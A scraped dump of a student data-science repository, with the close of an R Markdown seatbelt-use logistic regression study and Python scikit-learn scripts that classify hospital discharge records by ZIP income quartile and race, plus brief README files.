This parameter takes value in [0,1] and bridges the gap between the lasso and the ridge shrinkage/parameter tuning approaches.\n\nSource: http://www.milanor.net/blog/cross-validation-for-predictive-analytics-using-r/ \nSource: https://web.stanford.edu/~hastie/glmnet/glmnet_alpha.html#log\n\nAs a final step let's do that here just to see if we can improve our prediction accuracy performance. \n```{r}\n#Create response and predictor variables\nseatbelts <- trainingData_dfAge[, \"seatbelt_yn\"]\npredictors <- trainingData_dfAge[, -match(c(\"seatbelt_yn\"), colnames(trainingData_dfAge))]\n\ntrain_cv_set <- createDataPartition(seatbelts, p = 0.8, list = FALSE)\nstr(train_cv_set)\n\nset.seed(225)\n\n#Create training and response variables\ntrain_predictors <- predictors[train_cv_set, ]\ntrain_classes <- seatbelts[train_cv_set]\ntest_predictors <- predictors[-train_cv_set, ]\ntest_classes <- seatbelts[-train_cv_set]\n \n#Set seed for reproduceability\ncv_splits <- createFolds(seatbelts, k = 5, returnTrain = TRUE)\n```\n\nNow that we have created training and response variables by partitioning the data, we'll pass these to the trainControl and train functions of glmnet and have it return us optimal values for our tuning parameters of alpha and lambda. 
\n```{r}\nrequire(glmnet)\nrequire(caret)\n\nset.seed(225)\n\ncv_data_train <- trainingData_dfAge[train_cv_set, ]\ncv_data_test <- trainingData_dfAge[-train_cv_set, ]\n \nglmnet_grid <- expand.grid(alpha = c(0, .1, .2, .4, .6, .8, 1),\n lambda = seq(.01, .2, length = 20))\n#The train() function requires the model formula together with the indication of the model to fit and the grid of tuning parameter values to use.\n\n#Selection the number of iterations in the k-fold cross validation for parameter tuning\nglmnet_ctrl <- trainControl(method = \"cv\", number = 10)\nglmnet_fit <- train(seatbelt_yn ~ ., data = cv_data_train,\n method = \"glmnet\",\n tuneGrid = glmnet_grid, #select grid for plotting\n trControl = glmnet_ctrl) #specify method for selecting optimal parameters\n\nglmnet_fit$bestTune\n```\n\nWe see that glmnet has selected tuning parameters of alpha = 0.2 and lambda = 0.01. We'll now plot the results of model with the selected tuning parameters. \n\n```{r}\ntrellis.par.set(caretTheme())\nplot(glmnet_fit, scales = list(x = list(log = 2)), ylim = c(0.66,0.69))\n```\n\nWe can see that even with tuning our regularization parameters with glmnent, we aren't getting much of a boost in model accuracy. At this point, we can feel that we have done an exhaustive search and tuning of coefficients at this point. \n\nLet's finally visualize some predicted probabilities using our logistic regression model. 
First, we'll look at the Odds Ratios for Model 4: \n OR 2.5 % 97.5 %\n(Intercept) 0.9912012 0.9525943 1.031384\nSEX 4.1058692 3.1972367 5.275747\nAgeGroup 1.9146767 1.5656536 2.342260\nInvolvement 2.9515299 2.3501866 3.708737\nHOUR_OF_DAY 3.6289618 2.9009551 4.543663\nWEATHER 3.3575356 2.1738420 5.191351\nLANE_COUNT 1.0807956 0.9821536 1.188837\nSPEED_LIMIT 2.7679192 2.5860943 2.964576\n\nTo visualize predicted probabilities, we'll create two dataframe of male and female drivers by hour of day with AgeGroup set to Early Twenties, Weather = Clear, Lane Count = 2, and speed limit and time of Day changing. We'll then pass this dataframe to the predict function, using Model 4 to provide predicted probabilities of seatbelt use. \n```{r}\n#Create dataframe of male drivers by hour of day with AgeGroup set to Early Twenties, Weather = Clear, Lane Count = 2, and speed limit and time of Day changing. \ntimes <- unique(df_Ungrouped_AgeGroup_copy$HOUR_OF_DAY)\n\nnewdata1Males <- with(df_Ungrouped_AgeGroup, data.frame(SEX = rep(-0.135602205366684, 400), #Male, Female, Female\n AgeGroup = rep(-0.096374879558376, 400) , #\"Early Twenties\" (# -0.00269010462371031 = \"Late Twenties/Early Thirties\")\n Involvement = rep(0.136536567535011 , 400), #Driver\n HOUR_OF_DAY = rep(c(-0.0740957389622387, 0.163120634868719, -0.166749933730939, \n 0.270574034635523, 0.0751090318563372, 0.131617563097761, 0.2278741654211,-0.120257601954702, -0.0437420308413535, -0.312765783194137), 40)\n # (c(0.163120634868719, 0.270574034635523, 0.131617563097761, -0.135149089564895), 100)\n , #6 AM,10AM, 2:00 PM, 11:00 PM\n WEATHER = rep(-0.0361378659281332, 400), \n LANE_COUNT =rep(-0.320806855081444, 400), #2 lanes, (0.59084686992613 - lanes 3)\n SPEED_LIMIT = rep(c(-0.686890577831362, -0.232642741921142, 0.433326886961097, 1.27261747740865), each = 100)#25, #35, #45, #55\n ))\n#Add a column of predicted probability using model 5\nnewdata1Males$Sex <- rep(\"Male\", 400)\nnewdata1Males$predProb <- 
predict(logitMod_dfAge, newdata1Males, type = \"response\")\nnewdata1Males$RoadSize <- rep(\"2 Lanes\", 400) #\"3 Lanes\"), each =200\nnewdata1Males$Speed <- rep(c(\"25 MPH\", \"35 MPH\" ,\"45MPH\", \"55 MPH\") , each =100) \nnewdata1Males$TimeofDay <- rep(c( 4, 6, 8, 10, 12, 14, 18, 20, 22, 0),40)\n\n#Add predicted probabilities and create cofidence confidence intervals for predicted probabilities. \nnewdata2Males <- cbind(newdata1Males, predict(logitMod_dfAge, newdata = newdata1Males, type = \"link\",\n se = TRUE))\nnewdata2Males <- within(newdata2Males, {\n PredictedProb <- plogis(fit)\n LL <- plogis(fit - (1.96 * se.fit))\n UL <- plogis(fit + (1.96 * se.fit))\n})\n\nnewdata2Males\n\n```\n\nHere, we do the same and create dataframe of female drivers by hour of day with AgeGroup set to Early Twenties, Weather = Clear, Lane Count = 2, and speed limit and time of Day changing. \n\n```{r}\n\nnewdata1Females <- with(df_Ungrouped_AgeGroup, data.frame(SEX = rep(0.193055877385024, 400), # Female\n AgeGroup = rep(-0.096374879558376, 400), #Early Twenties\n\n Involvement = rep(0.136536567535011 , 400), #Driver\n HOUR_OF_DAY = rep(c(-0.0740957389622387, 0.163120634868719, -0.166749933730939, \n 0.270574034635523, 0.0751090318563372, 0.131617563097761, 0.2278741654211,-0.120257601954702, -0.0437420308413535, -0.312765783194137), 40)\n # (c(0.163120634868719, 0.270574034635523, 0.131617563097761, -0.135149089564895), 100)\n , #6 AM,10AM, 2:00 PM, 11:00 PM\n WEATHER = rep(-0.0361378659281332, 400), \n LANE_COUNT =rep(-0.320806855081444, 400), #2 lanes, (0.59084686992613 - lanes 3)\n SPEED_LIMIT = rep(c(-0.686890577831362, -0.232642741921142, 0.433326886961097, 1.27261747740865), each = 100)#25, #35, #45, #55\n ))\n#Add a column of predicted probability using model 5\nnewdata1Females$Sex <- rep(\"Female\", 400)\nnewdata1Females$predProb <- predict(logitMod_dfAge, newdata1Females, type = \"response\")\nnewdata1Females$RoadSize <- rep(c(\"2 Lanes\"), 400) #\"3 Lanes\" 
\nnewdata1Females$Speed <- rep(c(\"25 MPH\", \"35 MPH\" ,\"45MPH\", \"55 MPH\") , each =100) \nnewdata1Females$TimeofDay <- rep(c( 4, 6, 8, 10, 12, 14, 18, 20, 22, 0),40)\n\n#Now we are going to create standard errors and plot confidence intervals. \n\nnewdata2females <- cbind(newdata1Females, predict(logitMod_dfAge, newdata = newdata1Females, type = \"link\",\n se = TRUE))\nnewdata2females <- within(newdata2females, {\n PredictedProb <- plogis(fit)\n LL <- plogis(fit - (1.96 * se.fit))\n UL <- plogis(fit + (1.96 * se.fit))\n})\n\nnewdata2females\n```\n\nWe'll finish by combining these two tables of predicted probabilities and then plotting them with bans around the probability line that represent the confidence intervals for the predicted probability. \n\n```{r}\n#Combine the two data frames\ntotalDf <- rbind(newdata2females, newdata2Males)\nrequire(ggplot2)\n#Plot the total dataframe\npredicted_plot <- ggplot(totalDf, aes(x=TimeofDay, y=predProb)) + geom_ribbon(aes(ymin = LL, ymax = UL, fill = Speed), alpha = 0.2)+geom_line(aes(colour = Speed), size = 1)+facet_grid(~Sex)+ylab(\"Predicted Probability\")\n\npredicted_plot\n\n#Save Plot\nggsave(\n \"ggPredicted.png\",\n predicted_plot,\n width = 5.8,\n height = 3.5,\n dpi = 300)\n```\n\nIn the above visual we can see how the predicted probability of seatbelt use for male or female drivers changes based upon time, road speed, and driver type with weather (Clear), lane count (2), and AgeGroup (early Twenties) held constant. We can see that for the same time of day and speed of the road, a female is more likely to be wearing a seatbelt. However, we can see the issues that arise with the poor sensitivity of our model. The predicted probabilities are clearly underestimating the Seatbelt Use of Yes. We can confirm this both either by performing several basic calculations on our dataframe or by comparing to findings from other literature. 
\n\n### Conclusions\nIn this study, we initially trained and tested a model with seven predictor variables. This model had an accuracy of 80 percent, however, upon further inspection we found that it did a poor job of predicting seatbelt non-users. We suspected that this might have been a result of the bias in our sample. To account for this we resampled training data to have as many observations of non-seatbelt use as seatbelt use. Furthermore, we translated our categorical variables into continuous numeric variables using Weight of Evidence (WOE) values. \n\nAs a result, our model's ability to accurately predict seatbelt non-use greatly improved from ~1% to > 75% with an Area Under the Receiver Operator Curve (AUROC) of approximately 0.74. However, this improvement came at the cost of overall accuracy, which decreased to ~64%. The Odds Ratios of this model points to an occupant's Sex, (4.1058692), the Hour of Day (3.6289618), Weather (3.3575356), and Speed Limit (2.7679192) as the most significant factors affecting seatbelt use. The model's performance was then confirmed using a variant of k-fold cross-validation (CV). This CV was ran 250 times and provided a range of accuracy scores from 63.2 - 64.2%. Finally, as a last step to see if we could improve the performance, we calculated regularization parameters using the glmnet package. This did not significantly boost model performance. \n\nAs currently constructed, our best model - Model 4 - allows us to output predicted probabilities of seatbelt use while holding constant or changing variables of Sex, Age Group, Involvement, Hour of the Day, Weather, Lane Count, and Speed Limit. It is important to note that the application of this model for states other than Pennsylvania is limited as primary seatbelt enforcement laws differ by state. The performance of this model might be improved by additional predictor variables. 
For example, several studies have identified a relationship between vehicle type and seatbelt use, specifically that seatbelt use in pickup trucks is lower than other passenger vehicles. Additionally, we did not explore the potential of weighting our response variable of Seatbelt Use = No. \n\nIn this analysis, we trained and tested 5 models using seven predictor variables. Our best model as assessed with AIC, Accuracy, AUROC, Sensitivity, and Specificity performs fairly well at predicting occupants involved crashes who were not wearing seatbelt use. Given the significance of seatbelt use as a safety measure that reduces injury severity and mortality further development of similar predictive models is merited in order to support educational and public safety campaigns. \n" }, { "alpha_fraction": 0.8360655903816223, "alphanum_fraction": 0.8360655903816223, "avg_line_length": 59, "blob_id": "1a91676bdb31dd1f1441fb23d8876a97f24a9e0a", "content_id": "b9de9ecb7cdfae00a998e697b53cc18219f2c1a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 61, "license_type": "no_license", "max_line_length": 59, "num_lines": 1, "path": "/Introduction to Data Mining/Final/Visualization/README.md", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "This folder contains visualizations from the final project. 
\n" }, { "alpha_fraction": 0.5233297944068909, "alphanum_fraction": 0.565040647983551, "avg_line_length": 35.50967788696289, "blob_id": "2c942b5f8338c1b1c982597f6298d1d07b82c5f2", "content_id": "604d5479b2244b5f9e7bfe3ffd64010d915048d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5658, "license_type": "no_license", "max_line_length": 164, "num_lines": 155, "path": "/Machine Learning I/Midterm/Code/BernoulNB_GradientBoostedTrees/ZIP_bNb_Gbc.py", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 27 12:20:54 2017\n\n@author: davidrobison\n\"\"\"\n\n\nimport pandas as pd\nimport numpy as np\nimport random \nimport matplotlib.pyplot as plt\nfrom collections import Counter\nfrom sklearn.feature_selection import SelectKBest\nfrom sklearn.metrics import classification_report, accuracy_score, confusion_matrix, f1_score\nfrom sklearn.naive_bayes import BernoulliNB\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier\nfrom sklearn.model_selection import GridSearchCV, cross_val_score, train_test_split\nfrom sklearn.pipeline import Pipeline\n\ndf = pd.read_csv(\"data_train.csv\").dropna(1, thresh= 445000).dropna(0, how=\"any\").sample(n=100000, random_state = 16).drop([\"HOSPID\", \"KEY\", \"NIS_STRATUM\"], axis=1)\n#\"ASOURCE\", \"ATYPE\", \"TOTCHG\", \"ZIPINC_QRTL\"\n\n\n#==============================================================================\n# Bernouli Naive Bayes Classifier as Baseline with Binary Features\n#==============================================================================\n\ndfBernouli = df[[\"ZIPINC_QRTL\", \"AWEEKEND\", \"DIED\",\"FEMALE\", \"ORPROC\", 'CM_AIDS', 'CM_ALCOHOL', 'CM_ANEMDEF',\n 'CM_ARTH', 'CM_BLDLOSS', 'CM_CHF', 'CM_CHRNLUNG', 'CM_COAG',\n 'CM_DEPRESS', 'CM_DM', 'CM_DMCX', 'CM_DRUG', 'CM_HTN_C', 'CM_HYPOTHY',\n 'CM_LIVER', 'CM_LYMPH', 
'CM_LYTES', 'CM_METS', 'CM_NEURO', 'CM_OBESE',\n 'CM_PARA', 'CM_PERIVASC', 'CM_PSYCH', 'CM_PULMCIRC', 'CM_RENLFAIL',\n 'CM_TUMOR', 'CM_ULCER', 'CM_VALVE', 'CM_WGHTLOSS']]\n\ntoInt = [\"AWEEKEND\", \"DIED\",\"FEMALE\"]\n\nfor col in toInt:\n dfBernouli.loc[:, col] = dfBernouli.loc[:, col].astype(int)\n\n'''Create predictor and response numpy arrays using Pandas indexing for optimal \nperformance'''\nXzipBnb = np.array(dfBernouli.loc[:, dfBernouli.columns != 'ZIPINC_QRTL'])\nyZipBnb = np.array(dfBernouli.loc[:,\"ZIPINC_QRTL\"])\n\nX_trainBnb, X_testBnb, y_trainBnb, y_testBnb = train_test_split(XzipBnb, yZipBnb, test_size=0.33, random_state=42)\n\n#Look at distribution to see class imbalance and print out class\n#imbalance with Counter\nc = Counter(y_trainBnb)\nprint('Original dataset shape {}'.format(Counter(y_trainBnb)))\nprint([(i, c[i] / len(y_trainBnb) * 100.0) for i, count in c.most_common()])\nplt.hist(y_trainBnb)\nplt.title(\"Multiclass Distribution of ZIPINC_QRTL\")\n\n#Begin Pipeline Setup\nselect = SelectKBest()\nbNb = BernoulliNB()\nsteps = [(\"feature_selection\", select), (\"bernouli_nb\", bNb)]\npipeNb = Pipeline(steps)\n\nparaGridBnb = dict(feature_selection__k=[20,25,30])\n\ngsBnb = GridSearchCV(pipeNb, param_grid=paraGridBnb, scoring=\"f1_micro\", n_jobs=-1)\n\ngsBnb.fit(X_trainBnb, y_trainBnb)\n\nBnbPreds = gsBnb.predict(X_testBnb)\n\nBnbReport = classification_report(BnbPreds, y_testBnb)\nBnbScore = accuracy_score(BnbPreds, y_testBnb)\nBnbMatrix = confusion_matrix(BnbPreds, y_testBnb)\n\nbestModelBnb = gsBnb.best_estimator_\nfrom sklearn.externals import joblib\njoblib.dump(bestModelGb, 'ZIP_BnbBestModel.pkl', compress = 9)\n\n#==============================================================================\n#If I did a feature selection, I believe that the feature removal due to Bnb would have\n# higher feature importances. Will need to return. 
\n# precision recall f1-score support\n# \n# 1 0.35 0.33 0.34 9042\n# 2 0.00 0.11 0.00 18\n# 3 0.01 0.31 0.02 282\n# 4 0.78 0.36 0.49 23658\n# \n# avg / total 0.65 0.35 0.45 33000\n# \n# \n# Accuracy Score: 0.352212121212\n#==============================================================================\n\n\n#==============================================================================\n# Gradient Boosting Classifier without Re-sampling\n#==============================================================================\n\nXzipGb = np.array(df.loc[:, df.columns != 'ZIPINC_QRTL'])\nyZipGb = np.array(df.loc[:,\"ZIPINC_QRTL\"])\n\npipeGbc = Pipeline([\n (\"clf\", GradientBoostingClassifier())])\n\nlearningRate = [0.2]\nminSamples = [5,10]\n\nparamGridGbc = [{\n \"clf__min_samples_split\":minSamples,\n \"clf__learning_rate\":learningRate}]\n \ngsGbc = GridSearchCV(estimator=pipeGbc, param_grid = paramGridGbc,\n scoring = \"f1_micro\", cv = 3, n_jobs = -1)\n\nX_trainGb, X_testGb, y_trainGb, y_testGb = train_test_split(XzipGb, yZipGb, test_size=0.33, random_state=43)\n\ngsGbc.fit(X_trainGb, y_trainGb)\n\ngbcPreds = gsGbc.predict(X_testGb)\nprint(classification_report(y_testGb, gbcPreds))\nprint(accuracy_score(y_testGb, gbcPreds))\n\nbestModelGb = gsGbc.best_estimator_\n\nfrom sklearn.externals import joblib\njoblib.dump(bestModelGb, 'ZIP_GbBestModel.pkl', compress = 9)\n\n#==============================================================================\n# best_params: {'clf__learning_rate': 0.2, 'clf__min_samples_split': 10}\n# precision recall f1-score support\n# \n# 1 0.64 0.70 0.67 8394\n# 2 0.49 0.40 0.44 5833\n# 3 0.48 0.39 0.43 7627\n# 4 0.69 0.79 0.74 11146\n# \n# avg / total 0.59 0.61 0.60 33000\n# \n# Accuracy Score: 0.606393939394\n#==============================================================================\n\n#==============================================================================\n# Gradient Boosting Classifier with Over and Under 
Resampling\n#==============================================================================\n\n\n\npipelr.fit(X_train, y_train)\n\nprint(\"test accuracy: %.3f\" %pipelr.score(X_test, y_test))\n\n\n\nn" }, { "alpha_fraction": 0.797468364238739, "alphanum_fraction": 0.797468364238739, "avg_line_length": 78, "blob_id": "ac35ae4c503d831244437e4353ee9945996bd833", "content_id": "60d68950266368c36da7bfa5a2c3b7b5a5dbb4af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 79, "license_type": "no_license", "max_line_length": 78, "num_lines": 1, "path": "/Machine Learning I/Final/README.md", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "This folder contains code, a report, and a presentation for the final project.\n" }, { "alpha_fraction": 0.8110598921775818, "alphanum_fraction": 0.8110598921775818, "avg_line_length": 215, "blob_id": "144f4afdad9d97fee42ed02df09064bfb13bebf3", "content_id": "5fde1b662ce1120a2de28a56c3f9987af2f90c8e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 217, "license_type": "no_license", "max_line_length": 215, "num_lines": 1, "path": "/Introduction to Data Mining/Final/README.md", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "This folder contains code and presentation from final project work for this course, which used data from the Centers for Medicare and Medicaid Services (CMS) and the Centers for Disease Prevention and Control (CDC).\n\n" }, { "alpha_fraction": 0.8061224222183228, "alphanum_fraction": 0.8061224222183228, "avg_line_length": 96, "blob_id": "ed7564a44e3df8ff3a248adee925b91063ffa82f", "content_id": "041bf4c84c022336de0490f46b40b67d69217c4b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 98, "license_type": "no_license", "max_line_length": 96, "num_lines": 1, "path": "/Machine Learning 
I/Midterm/Code/RandomForest/README.md", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "Ipython notebooks for random forest analysis of varibles in this project. Primary author Nathan Zencey. \n" }, { "alpha_fraction": 0.5064523816108704, "alphanum_fraction": 0.5590214729309082, "avg_line_length": 39.222930908203125, "blob_id": "6c98eaf4d77ec456292ab1e78633299fa06d8457", "content_id": "49265357037a74f81a8ad8012a12b6aec68e9230", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12631, "license_type": "no_license", "max_line_length": 164, "num_lines": 314, "path": "/Machine Learning I/Midterm/Code/BernoulNB_GradientBoostedTrees/Race_bNb_Gbt.py", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 27 10:22:25 2017\n\n@author: davidrobison\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport random \nimport matplotlib.pyplot as plt\nfrom collections import Counter\nfrom sklearn.externals import joblib\nfrom sklearn.feature_selection import SelectKBest\nfrom sklearn.metrics import classification_report, accuracy_score, confusion_matrix, f1_score\nfrom sklearn.naive_bayes import BernoulliNB\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier\nfrom sklearn.model_selection import GridSearchCV, cross_val_score, train_test_split\nfrom sklearn.pipeline import Pipeline\n\n\n#Read in dataframe, randomly sampling 100,000 values and dropping \n#HOSPID, KEY, and NISSTRATUM which are noisey variables\ndf = pd.read_csv(\"data_train.csv\").dropna(1, thresh= 445000).dropna(0, how=\"any\").sample(n=100000, random_state = 12).drop([\"HOSPID\", \"KEY\", \"NIS_STRATUM\"], axis=1)\n\n#==============================================================================\n# Bernouli Naive Bayes Classifier as Baseline with Binary 
Features\n#==============================================================================\n\n#Select binary features from df\ndfBernouli = df[[\"RACE\", \"AWEEKEND\", \"DIED\",\"FEMALE\", \"ORPROC\", 'CM_AIDS', 'CM_ALCOHOL', 'CM_ANEMDEF',\n 'CM_ARTH', 'CM_BLDLOSS', 'CM_CHF', 'CM_CHRNLUNG', 'CM_COAG',\n 'CM_DEPRESS', 'CM_DM', 'CM_DMCX', 'CM_DRUG', 'CM_HTN_C', 'CM_HYPOTHY',\n 'CM_LIVER', 'CM_LYMPH', 'CM_LYTES', 'CM_METS', 'CM_NEURO', 'CM_OBESE',\n 'CM_PARA', 'CM_PERIVASC', 'CM_PSYCH', 'CM_PULMCIRC', 'CM_RENLFAIL',\n 'CM_TUMOR', 'CM_ULCER', 'CM_VALVE', 'CM_WGHTLOSS']]\n\n#Convert non-numeric columns to type int\ntoInt = [\"AWEEKEND\", \"DIED\",\"FEMALE\"]\nfor col in toInt:\n dfBernouli.loc[:, col] = dfBernouli.loc[:, col].astype(int)\n\n\nXraceBnb = np.array(dfBernouli.loc[:, dfBernouli.columns != 'RACE'])\nyRaceBnb = np.array(dfBernouli.loc[:,\"RACE\"])\n\n#Train test split\nX_trainBnb, X_testBnb, y_trainBnb, y_testBnb = train_test_split(XraceBnb, yRaceBnb, test_size=0.33, random_state=42)\n\n#Look at distribution to see class imbalance and print out class\n#imbalance with Counter\nc = Counter(y_trainBnb)\nprint('Original dataset shape {}'.format(Counter(y_trainBnb)))\nprint([(i, c[i] / len(y_trainBnb) * 100.0) for i, count in c.most_common()])\nplt.hist(y_trainBnb)\nplt.title(\"Multiclass Distribution of Race\")\n\n#Begin Pipeline Setup with a step for univariate feature selection\nselect = SelectKBest()\nbNb = BernoulliNB()\nsteps = [(\"feature_selection\", select), (\"bernouli_nb\", bNb)]\npipeNb = Pipeline(steps)\n\nparaGridBnb = dict(feature_selection__k=[30,31,32,33])\n\n#Run 3-fold Cross Validated GridSearch\ngsBnb = GridSearchCV(pipeNb, param_grid=paraGridBnb, scoring=\"f1_macro\", n_jobs=-1)\ngsBnb.fit(X_trainBnb, y_trainBnb)\n\n#Predict using fitted bNb model and print classification report and accuracy score\nBnbPreds = gsBnb.predict(X_testBnb)\nBnbReport = classification_report(BnbPreds, y_testBnb)\nBnbScore = accuracy_score(BnbPreds, 
y_testBnb)\nprint(BnbReport)\nprint(BnbScore)\n\n#Save Model\nbestModelBnb = gsBnb.best_estimator_\njoblib.dump(bestModelBnb, 'Race_BnbBestModel.pkl', compress = 9)\n\n#==============================================================================\n#Best Parameters {'feature_selection__k': 32}\n\n# precision recall f1-score support\n#\n# 1 1.00 0.69 0.82 32823\n# 2 0.02 0.55 0.03 177\n# 3 0.00 0.00 0.00 0\n# 4 0.00 0.00 0.00 0\n# 5 0.00 0.00 0.00 0\n# 6 0.00 0.00 0.00 0\n#\n# avg / total 0.99 0.69 0.81 33000\n\n# Accuracy Score 0.690545454545\n#==============================================================================\n\n\n#==============================================================================\n# Gradient Boosted Trees Classifier without Re-sampling\n#==============================================================================\n\n#Create new X and y arrays for train test split\nXraceGb = np.array(df.loc[:, df.columns != 'RACE'])\nyRaceGb = np.array(df.loc[:,\"RACE\"])\n\n#Initiate pipeline and paramGrid to pass to Gridserach\npipeGbc = Pipeline([\n (\"clf\", GradientBoostingClassifier())])\n \nlearning = [0.2]\nsamplesSplit = [7,20]\nparamGridGbc = [{\n \"clf__min_samples_split\":samplesSplit,\n \"clf__learning_rate\":learning}]\n \ngsGbc = GridSearchCV(estimator=pipeGbc, param_grid = paramGridGbc,\n scoring = \"f1_micro\", cv = 3, n_jobs = -1)\n\n#Train test split\nX_trainGb, X_testGb, y_trainGb, y_testGb = train_test_split(XraceGb, yRaceGb, test_size=0.33, random_state=43)\n\n#Fit grid search\ngsGbc.fit(X_trainGb, y_trainGb)\n\ngbcPreds = gsGbc.predict(X_testGb)\nprint(classification_report(y_testGb, gbcPreds))\nprint(accuracy_score(y_testGb, gbcPreds))\n\nbestModelGb = gsGbc.best_estimator_\n\n#Save best model and review precision,recall, and f1-score\nfrom sklearn.externals import joblib\njoblib.dump(bestModelGb, 'Race_GBModel.pkl', compress = 9)\n#==============================================================================\n# Best 
Parameters:{'clf__learning_rate': 0.2, 'clf__min_samples_split': 7}\n# precision recall f1-score support\n# \n# 1 0.82 0.95 0.88 22746\n# 2 0.57 0.46 0.51 5802\n# 3 0.54 0.33 0.41 2688\n# 4 0.00 0.00 0.00 430\n# 5 0.03 0.02 0.03 42\n# 6 0.82 0.20 0.33 1292\n# \n# avg / total 0.74 0.77 0.74 33000\n# \n# 0.768363636364\n#==============================================================================\n\n#BELOW ARE STEPS THAT WERE TAKEN TO VALIDATE THE BEST PARAMETERS FOR A \n#BEST ESTIMATOR. VALIDATION CURVES WERE PRODUCED AND ARE AVAILABLE IN SUPPLEMENTARY\n#FILES FOLDER\n\n#==============================================================================\n# Gradient Boosted Validation Curve min_samples_split\n#==============================================================================\n\nfrom sklearn.model_selection import validation_curve\n\nparam_range = [3,10, 20,40]\ntrain_scores, test_scores = validation_curve(estimator= pipelr,\n X= X_train,\n y = y_train,\n param_name= \"clf__min_samples_split\",\n param_range = param_range,\n cv = 5)\n\ntrain_mean = np.mean(train_scores, axis=1)\ntrain_std = np.std(train_scores, axis=1)\ntest_mean = np.mean(test_scores, axis=1)\ntest_std = np.std(test_scores, axis=1)\n\nimport matplotlib.pyplot as plt\nfig1 = plt.figure()\nplt.plot(param_range, train_mean, color='blue', marker='o', markersize=5,\n label='training accuracy')\nplt.fill_between(param_range, train_mean + train_std,\n train_mean - train_std, alpha=0.15,\n color='blue')\nplt.plot(param_range, test_mean, color='green', linestyle='--',\n marker='s', markersize=5,\n label='validation accuracy')\nplt.fill_between(param_range, test_mean + test_std,\n test_mean - test_std,\n alpha=0.15, color='green')\nplt.grid()\nplt.legend(loc='center right')\nplt.xlabel('Min Samples Split')\nplt.ylabel('Accuracy')\nplt.show()\nfig1.savefig(\"Race_min_samples\", dpi = 300)\n# test_mean: array([ 3: 0.76629874, 10: 0.76592558, 20: 0.7669256 , 40: 
0.76664203])\n\n#==============================================================================\n# Gradient Boosted Validation Curve max_depth\n#==============================================================================\n\nparam_range = [3, 7]\ntrain_scores, test_scores = validation_curve(estimator= pipelr,\n X= X_train,\n y = y_train,\n param_name= \"clf__max_depth\",\n param_range = param_range,\n cv = 3)\n\ntrain_mean = np.mean(train_scores, axis=1)\ntrain_std = np.std(train_scores, axis=1)\ntest_mean = np.mean(test_scores, axis=1)\ntest_std = np.std(test_scores, axis=1)\n\nfig2 = plt.figure()\nimport matplotlib.pyplot as plt\nplt.plot(param_range, train_mean, color='blue', marker='o', markersize=5,\n label='training accuracy')\nplt.fill_between(param_range, train_mean + train_std,\n train_mean - train_std, alpha=0.15,\n color='blue')\nplt.plot(param_range, test_mean, color='green', linestyle='--',\n marker='s', markersize=5,\n label='validation accuracy')\nplt.fill_between(param_range, test_mean + test_std,\n test_mean - test_std,\n alpha=0.15, color='green')\nplt.grid()\nplt.legend(loc='upper right')\nplt.xlabel('Max Depth')\nplt.ylabel('Accuracy')\nplt.show()\nfig2.savefig(\"Race_max_depth\", dpi = 300)\n\n#Test mean: array([ 0.76343317, 0.75716423])\n\n#==============================================================================\n# Gradient Boosted Validation Curve learning rate\n#==============================================================================\n\nparam_range = [0.2, 0.5, 1.0]\ntrain_scores, test_scores = validation_curve(estimator= pipelr,\n X= X_train,\n y = y_train,\n param_name= \"clf__learning_rate\",\n param_range = param_range,\n cv = 3)\n\ntrain_mean = np.mean(train_scores, axis=1)\ntrain_std = np.std(train_scores, axis=1)\ntest_mean = np.mean(test_scores, axis=1)\ntest_std = np.std(test_scores, axis=1)\n\nimport matplotlib.pyplot as plt\nfig3 = plt.figure()\nplt.plot(param_range, train_mean, color='blue', marker='o', 
markersize=5,\n label='training accuracy')\nplt.fill_between(param_range, train_mean + train_std,\n train_mean - train_std, alpha=0.15,\n color='blue')\nplt.plot(param_range, test_mean, color='green', linestyle='--',\n marker='s', markersize=5,\n label='validation accuracy')\nplt.fill_between(param_range, test_mean + test_std,\n test_mean - test_std,\n alpha=0.15, color='green')\nplt.grid()\nplt.legend(loc='upper right')\nplt.xlabel('Learning Rate')\nplt.ylabel('Accuracy')\nplt.show()\nfig3.savefig(\"Race_learningRate\", dpi = 300)\n#test mean [ 0.76304508, 0.75623917, 0.72835851]\n\n#==============================================================================\n# Cross Validation Curve with Cross Val Score\n#==============================================================================\n\nfrom sklearn.model_selection import cross_val_score\n\npipeGbcVal = Pipeline([\n (\"clf\", GradientBoostingClassifier(n_estimators = 300, min_samples_split=20, learning_rate= 0.2))])\nscores = cross_val_score(estimator=pipeGbcVal, X=X_trainGb, y=y_trainGb, cv=5, n_jobs= -1) \n# scores: array([ 0.77270353, 0.7319603 , 0.77404671, 0.77341593, 0.76518883])\n\npipeGbcVal500 = Pipeline([\n (\"clf\", GradientBoostingClassifier(n_estimators = 500, min_samples_split=20, learning_rate= 0.2))])\nscores500 = cross_val_score(estimator=pipeGbcVal, X=X_trainGb, y=y_trainGb, cv=5, n_jobs= -1) \n# scores500: array([ 0.77106186, 0.72733378, 0.77203194, 0.77341593, 0.77078668])\n\npipeGbcVal1000 = Pipeline([\n (\"clf\", GradientBoostingClassifier(n_estimators = 1000, min_samples_split=20, learning_rate= 0.2))])\nscores1000 = cross_val_score(estimator=pipeGbcVal, X=X_trainGb, y=y_trainGb, cv=5, n_jobs= -1) \n#scores1000: array([ 0.76636072, 0.72830386, 0.76755466, 0.7731174 , 0.77011494])\n \n\nimport 